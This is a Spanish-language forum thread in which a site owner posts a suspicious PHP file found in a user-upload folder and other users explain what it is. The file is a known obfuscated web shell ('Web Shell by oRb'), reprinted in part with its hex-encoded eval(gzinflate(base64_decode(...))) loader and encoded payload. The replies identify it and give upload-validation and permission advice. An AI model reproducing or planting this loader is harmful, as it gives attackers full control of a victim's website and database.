Intento de hackeo en sitio web

Hola buen día.

Hoy en una de mis webs encontré el siguiente código en uno de los directorios donde se encuentran los archivos que suben los usuarios por medio de un formulario y me gustaría saber qué hace:

<?php # Web Shell by oRb

//$auth_pass = "63a9f0ea7bb98050796b649e85481845";

$color = "#df5";

$default_action = 'FilesMan';

$default_use_ajax = true;

$default_charset = 'Windows-1251';

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x 61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65 \x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2 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 ga+N109hz7ZxquK3th0DJ72BBbeY...

...
Fz+YglbQE7EXOqLbMRTRwYu1R5CeSSqLu8vuthnVjrPo/eGFLgRPNXh7xsmiBHH1AC0T9z+AcaK5wplaYmmI8QMy6hJN6vv +H4XL9FdLFUEiippqKn6fwE='\x29\x29\x29\x3B",".");?>

Pues por lo que dice en el primer comentario, es un Web Shell, son scripts PHP que te permiten hacer todo en tu sitio, como subir, borrar, mover archivos, bajarlos, y acceso a MySQL. Es como un CPanel que le permite al hacker hacer todo en tu sitio.

Saludos.

XSS, RFI, inyeccion Mysql(quizas) son vulnerabilidades que debes de tener en cuenta.

Holas,

Parece que este es el php desofuscado:

http://pastie.org/1058996

Es raro que tengas un formulario para subir archivo y sobre todo PHP, seria bueno, creo que controles los permisos y funciones de ejecucion en php.

Saludos

Impresionante el script, de los mas completos que eh visto, y tal como dice @gildus, debes SIEMPRE desconfiar de todos tus usuarios, verificar permisos y sobre todo, si vas a subir archivos verificar siempre el tipo de archivo a subir

Hola akus... amm... Me puedes pasar el link del formulario donde se sube los archivos :D ?
Bueno es broma, Pero enserio tienes que validar que tipo de archivos vas a permitir que suban los usuarios, que bueno que te diste cuenta a tiempo. Borra ese archivo y modificar tu script PHP o borrar tambien tu formulario con el que suben los usuarios mientras averiguas esto de validar los tipos de archivos y/o como dar permisos a los directorios.

Saludos.

Hola me interesa este tema mucho, todos sugieren cambiar permisos, validar tipos de archivos, controlar funciones de ejecucion etc.

pero nadie pone como...al menos en esto de la seguridad yo y al parecer igual que el compañero somos novatos

les agradeceria que nos pusieran algun ejemplo, enlace, tutorial, manual o algo para orientarnos

gracias

Holas,

Tal vez con una simple busqueda en el foro en general podrias tener una mejor recoleccion de varias experiencias y temas tratados y que es en este caso con PHP; la mejor forma (creo yo) de tener mas seguridad en tus script es con la practica, respetando patrones de programacion, programando con las buenas practicas. Por ejemplo existen frameworks que trabaja en esos temas por ejemplo de validaciones, permisos, tipos de archivo, funciones, etc. son detalles que ya otros trabajan, una comunidad trabajando en ello, pero no quiere decir que se sepa sino para tomar de referencia.

Ejemplos, manueles, tutoriales, links, etc. en google los encuentras en muchisimos idiomas. Existe una seccion de tutoriales del Foro sobre PHP que creo que puede ayudarnos para empezar.

http://www.forosdelweb.com/f18/aport...as-php-569025/

http://www.forosdelweb.com/f18/indice-faqs-php-108208/

http://www.forosdelweb.com/wiki/Categor%C3%ADa:Manuales

http://www.php.net/manual/es/security.php


Saludos

Gracias, yo me refería de acuerdo a su experiencia para saber hacia donde enfocar nuestros mayores esfuerzos...

me pondré a leer lo que pones y les comento Saludos!